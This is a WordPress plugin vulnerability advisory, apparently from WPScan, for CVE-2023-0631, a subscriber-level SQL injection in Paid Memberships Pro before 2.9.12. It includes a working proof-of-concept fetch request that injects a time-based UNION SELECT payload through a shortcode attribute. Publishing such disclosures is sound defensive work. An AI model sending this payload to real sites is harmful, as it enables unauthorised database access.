Paid Memberships Pro < 2.9.12 – Subscriber+ SQL Injection | CVE 2023-0631 | Plugin Vulnerabilities

Description

The plugin does not prevent subscribers from rendering shortcodes that concatenate attributes directly into an SQL query.

Proof of Concept

While logged in as a subscriber, send the following request:

(await fetch('/wp-admin/admin-ajax.php',{method:'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'},body:'action=parse-media-shortcode&shortcode=[membership delay="Y" levels="(-1)) UNION SELECT sleep(10)-- ,L"]'})).text()

If successful, the request should hang for ~10 seconds, indicating we successfully injected something in the affected SQL query.

Affects Plugins

paid-memberships-pro

Fixed in 2.9.12

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Marc Montpas

Submitter

Marc Montpas

Submitter website

https://wpscan.com

Submitter twitter

Verified

Yes

WPVDB ID

19ef92fd-b493-4488-91f0-e6ba51362f79

Timeline

Publicly Published

2023-02-27 (about 1 years ago)

Added

2023-02-27 (about 1 years ago)

Last Updated

2023-02-27 (about 1 years ago)

Other

Published

Title

Published

2016-02-25

Title

WP Ultimate Exporter <= 1.1 - Unauthenticated SQL Injection

Published

2023-12-05

Title

Sayfa Sayaç <= 2.6 - Unauthenticated SQL Injection

Published

2014-08-01

Title

myftp-ftp-like-plugin-for-wordpress v2 - SQL Injection

Published

2019-10-23

Title

Groundhogg < 1.3.11.8 - Authenticated SQL Injection

Published

2014-08-01

Title

Eventify - Simple Events <= 1.7.f - SQL Injection